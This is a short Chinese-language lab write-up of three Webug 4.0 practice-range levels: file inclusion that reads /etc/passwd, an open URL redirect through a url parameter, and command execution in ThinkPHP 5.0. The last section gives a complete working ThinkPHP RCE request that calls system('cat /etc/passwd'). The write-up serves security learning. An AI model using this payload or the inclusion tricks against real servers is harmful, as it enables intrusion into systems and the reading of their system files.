Webug4.0-文件包含 URL跳转 命令执行(ThinkPHP V5.0)

0x01 文件包含漏洞

Webug4.0-文件包含 URL跳转 命令执行(ThinkPHP V5.0)_第1张图片
是说怎么这么熟悉。。。原来通过相对路径去包含的dom_xss。。那么直接通过这个去包含/etc/passwd
Webug4.0-文件包含 URL跳转 命令执行(ThinkPHP V5.0)_第2张图片
可以了,试过了直接用/etc/passwd绝对路径也可以,用php伪协议也可以
Webug4.0-文件包含 URL跳转 命令执行(ThinkPHP V5.0)_第3张图片
远程包含也行
Webug4.0-文件包含 URL跳转 命令执行(ThinkPHP V5.0)_第4张图片


0x02 URL跳转

这关一点都不明显,,审查前端找了半天,才找到了url参数,当然凭经验用url可能一下就试出来了
Webug4.0-文件包含 URL跳转 命令执行(ThinkPHP V5.0)_第5张图片
url_redirect.php后面加上?url=http:/xxxxxxxxx即可跳转到任意的界面,算是csrf的一种了。


0x03 命令执行

正常情况下点击打开靶场,出来的地址是错的,这是因为数据库里面存的地址不对,所以需要大家自己手动改,或者直接访问http://x.x.x.x/xxx/control/more/tp5/public/index.php
Webug4.0-文件包含 URL跳转 命令执行(ThinkPHP V5.0)_第6张图片
ThinkPHP框架的网站,直接查文件,systemcat /etc/passwd都是能换的。

http://192.168.181.250/Webug4.0/control/more/tp5/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /etc/passwd
Webug4.0-文件包含 URL跳转 命令执行(ThinkPHP V5.0)_第7张图片

你可能感兴趣的:(#,Webug4.0)